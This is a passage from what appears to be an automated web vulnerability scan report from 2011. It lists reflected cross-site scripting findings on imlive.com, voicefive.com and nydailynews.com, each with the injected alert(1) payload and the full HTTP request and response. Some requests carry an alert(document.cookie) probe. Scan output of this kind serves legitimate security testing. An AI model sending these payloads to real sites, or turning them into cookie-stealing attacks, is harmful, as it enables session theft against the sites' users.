Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:40 GMT
Connection: close
Content-Length: 23490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.156. http://ar.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:33 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

4.157. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload eb6b5<script>alert(1)</script>fdda9ab7c58 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractioneb6b5<script>alert(1)</script>fdda9ab7c58&n=ar_int_p85001580&1296224152232 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:20 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractioneb6b5<script>alert(1)</script>fdda9ab7c58("");

4.158. http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the AR_C request parameter is copied into the HTML document as plain text between tags. The payload 9c80e<script>alert(1)</script>2ca5504680a was submitted in the AR_C parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=404017409c80e<script>alert(1)</script>2ca5504680a HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:22 2011&prad=58087481&arc=404017409c80e%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ca5504680a&; expires=Thu 28-Apr-2011 16:37:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26516

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"404017409c80e<script>alert(1)</script>2ca5504680a",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("404017409c80e<script>
...[SNIP]...

4.159. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload 25b4d<script>alert(1)</script>955dc17c970 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=5808748125b4d<script>alert(1)</script>955dc17c970&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=5&initExp=Wed Jan 26 20:14:29 2011&recExp=Thu Jan 27 13:24:45 2011&prad=58087454&arc=40401349&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:21 2011&prad=5808748125b4d%3Cscript%3Ealert%281%29%3C%2Fscript%3E955dc17c970&arc=40401349&; expires=Thu 28-Apr-2011 16:37:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296232641; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26380

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"5808748125b4d<script>alert(1)</script>955dc17c970",Pid:"p85001580",Arc:"40401349",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("40401349"),Exp:COMSCORE.BMX.
...[SNIP]...

4.160. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1a8f'%3balert(1)//59512309c7e was submitted in the REST URL parameter 1. This input was echoed as b1a8f';alert(1)//59512309c7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/cssb1a8f';alert(1)//59512309c7e/20090601/nydn_homepage.css';
}


   //-->
...[SNIP]...

4.161. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d939b'%3balert(1)//dd97d6f8afc was submitted in the REST URL parameter 2. This input was echoed as d939b';alert(1)//dd97d6f8afc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20090601d939b'%3balert(1)//dd97d6f8afc/nydn_homepage.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:15 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20090601d939b';alert(1)//dd97d6f8afc/nydn_homepage.css';
}


   //-->
...[SNIP]...

4.162. http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20090601/nydn_homepage.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc63e'%3balert(1)//b971dbab287 was submitted in the REST URL parameter 3. This input was echoed as bc63e';alert(1)//b971dbab287 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20090601/nydn_homepage.cssbc63e'%3balert(1)//b971dbab287 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
kie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20090601/nydn_homepage.cssbc63e';alert(1)//b971dbab287';
}


   //-->
...[SNIP]...

4.163. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5631c'%3balert(1)//e099aec72c8 was submitted in the REST URL parameter 1. This input was echoed as 5631c';alert(1)//e099aec72c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css5631c'%3balert(1)//e099aec72c8/20101001/nydn_global.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css5631c';alert(1)//e099aec72c8/20101001/nydn_global.css';
}


   //-->
...[SNIP]...

4.164. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38e81'%3balert(1)//ee1bc773075 was submitted in the REST URL parameter 2. This input was echoed as 38e81';alert(1)//ee1bc773075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/2010100138e81'%3balert(1)//ee1bc773075/nydn_global.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:14 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/2010100138e81';alert(1)//ee1bc773075/nydn_global.css';
}


   //-->
...[SNIP]...

4.165. http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_global.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8a1'%3balert(1)//7f8a78c8a5 was submitted in the REST URL parameter 3. This input was echoed as 1b8a1';alert(1)//7f8a78c8a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20101001/nydn_global.css1b8a1'%3balert(1)//7f8a78c8a5 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_global.css1b8a1';alert(1)//7f8a78c8a5';
}


   //-->
...[SNIP]...

4.166. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18eee'%3balert(1)//eaae29adffe was submitted in the REST URL parameter 1. This input was echoed as 18eee';alert(1)//eaae29adffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css18eee'%3balert(1)//eaae29adffe/20101001/nydn_section.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:46 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css18eee';alert(1)//eaae29adffe/20101001/nydn_section.css';
}


   //-->
...[SNIP]...

4.167. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce94e'%3balert(1)//a55edf17fd4 was submitted in the REST URL parameter 2. This input was echoed as ce94e';alert(1)//a55edf17fd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20101001ce94e'%3balert(1)//a55edf17fd4/nydn_section.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:16 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001ce94e';alert(1)//a55edf17fd4/nydn_section.css';
}


   //-->
...[SNIP]...

4.168. http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_section.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50562'%3balert(1)//8959375d35d was submitted in the REST URL parameter 3. This input was echoed as 50562';alert(1)//8959375d35d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20101001/nydn_section.css50562'%3balert(1)//8959375d35d HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
